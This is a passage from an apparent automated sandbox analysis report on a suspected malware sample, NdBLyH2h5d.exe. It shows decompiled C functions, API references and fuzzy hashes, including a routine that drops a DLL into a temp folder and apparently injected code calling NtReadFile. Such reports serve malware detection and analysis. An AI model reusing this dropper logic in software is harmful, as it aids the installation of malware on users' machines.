				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                                              0x004021fc
                                                                              0x00402200
                                                                              0x00402208
                                                                              0x0040220e
                                                                              0x00402211
                                                                              0x0040221e
                                                                              0x0040222f
                                                                              0x00402233
                                                                              0x0040223a
                                                                              0x00402243
                                                                              0x0040224b
                                                                              0x0040224e
                                                                              0x00402251
                                                                              0x00402255
                                                                              0x00402266
                                                                              0x0040226f
                                                                              0x004026da
                                                                              0x004026da
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • lstrlenA.KERNEL32 ref: 00402218
                                                                              • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                              • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3674637002-0
                                                                              • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                              • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                              • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                              • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                              0x00405568
                                                                              0x0040556f
                                                                              0x00405572
                                                                              0x00405577
                                                                              0x0040558a
                                                                              0x004055a4
                                                                              0x00000000
                                                                              0x004055a4
                                                                              0x0040558e
                                                                              0x0040558f
                                                                              0x00405592
                                                                              0x00405593
                                                                              0x0040559b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040559d
                                                                              0x004055a0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004055a0
                                                                              0x00000000
                                                                              0x00405580
                                                                              0x00000000
                                                                              0x00405581

                                                                              APIs
                                                                              • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040556D
                                                                              • CharNextA.USER32(00000000), ref: 00405572
                                                                              • CharNextA.USER32(00000000), ref: 00405581
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 3213498283-3916508600
                                                                              • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                              • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                              • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                              • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                              0x00401d9c
                                                                              0x00401db5
                                                                              0x00401dbf
                                                                              0x00401dc4
                                                                              0x00401dcf
                                                                              0x00401dd6
                                                                              0x00401de8
                                                                              0x00401dee
                                                                              0x00401df3
                                                                              0x00401dfd
                                                                              0x00402536
                                                                              0x00401581
                                                                              0x004028d7
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401D95
                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                              • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                              • String ID:
                                                                              • API String ID: 3272661963-0
                                                                              • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                              • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                              • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                              • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





                                                                              0x00404cad
                                                                              0x00404cca
                                                                              0x00404cce
                                                                              0x00404cd0
                                                                              0x00404cd0
                                                                              0x00404cd0
                                                                              0x00404cd7
                                                                              0x00404ce3
                                                                              0x00404d03
                                                                              0x00000000
                                                                              0x00404ce5
                                                                              0x00404ce8
                                                                              0x00404cee
                                                                              0x00404cf0
                                                                              0x00404d43
                                                                              0x00404d43
                                                                              0x00404d46
                                                                              0x00000000
                                                                              0x00404d56
                                                                              0x00404cfc
                                                                              0x00404cfe
                                                                              0x00404d06
                                                                              0x00404d06
                                                                              0x00404d09
                                                                              0x00404d0b
                                                                              0x00404d11
                                                                              0x00404d20
                                                                              0x00404d26
                                                                              0x00404d2d
                                                                              0x00404d34
                                                                              0x00404d3b
                                                                              0x00404d40
                                                                              0x00404d11
                                                                              0x00000000
                                                                              0x00404d09
                                                                              0x00404ce3
                                                                              0x00404cb3
                                                                              0x00404cbe
                                                                              0x00000000
                                                                              0x00404cc3
                                                                              0x00000000

                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00404CE8
                                                                              • CallWindowProcA.USER32 ref: 00404D56
                                                                                • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                              • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                              • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                              • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                              0x0040253c
                                                                              0x0040253c
                                                                              0x0040253f
                                                                              0x0040255a
                                                                              0x00402541
                                                                              0x00402543
                                                                              0x00402548
                                                                              0x0040254f
                                                                              0x00402561
                                                                              0x004026da
                                                                              0x004026da
                                                                              0x00402567
                                                                              0x00402579
                                                                              0x004015c8
                                                                              0x004015ca
                                                                              0x00000000
                                                                              0x004015d0
                                                                              0x004015ca
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, xrefs: 00402548, 0040256D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileWritelstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 427699356-483980473
                                                                              • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                              • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                              • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                              • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                                              0x00405514
                                                                              0x0040551e
                                                                              0x00405520
                                                                              0x00405527
                                                                              0x0040552f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040552f
                                                                              0x00405531
                                                                              0x00405535

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-1669384263
                                                                              • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                              • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                              • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                              • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                              0x00405630
                                                                              0x00405632
                                                                              0x0040565a
                                                                              0x0040563f
                                                                              0x00405644
                                                                              0x0040564f
                                                                              0x00000000
                                                                              0x0040566c
                                                                              0x00405658
                                                                              0x00405658
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                              • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                              • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                              • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: NdBLyH2h5d.exe PID: 6140 Parent PID: 5612 NdBLyH2h5d.exeCOMMON

                                                                              Executed Functions

                                                                              Function 0041825A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: B=A$B=A
                                                                              • API String ID: 2738559852-2767357659
                                                                              • Opcode ID: 6f84ba5e72c32351965744c8ec25ff91069dc3cc27ef8587f5d03ee881435c9b
                                                                              • Instruction ID: ea36dd2d862871e1a50bc0eca0770c179a9c70d80a8a2cef11778b0c78b76812
                                                                              • Opcode Fuzzy Hash: 6f84ba5e72c32351965744c8ec25ff91069dc3cc27ef8587f5d03ee881435c9b
                                                                              • Instruction Fuzzy Hash: 70F0ECB6200504AFCB04DF99DC81EEB77BAFF8C354F058259BA1DD7241D630E8518BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                              0x00418263
                                                                              0x0041826f
                                                                              0x00418277
                                                                              0x00418282
                                                                              0x0041829d
                                                                              0x004182a5
                                                                              0x004182a9

                                                                              APIs
                                                                              • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: B=A$B=A
                                                                              • API String ID: 2738559852-2767357659
                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
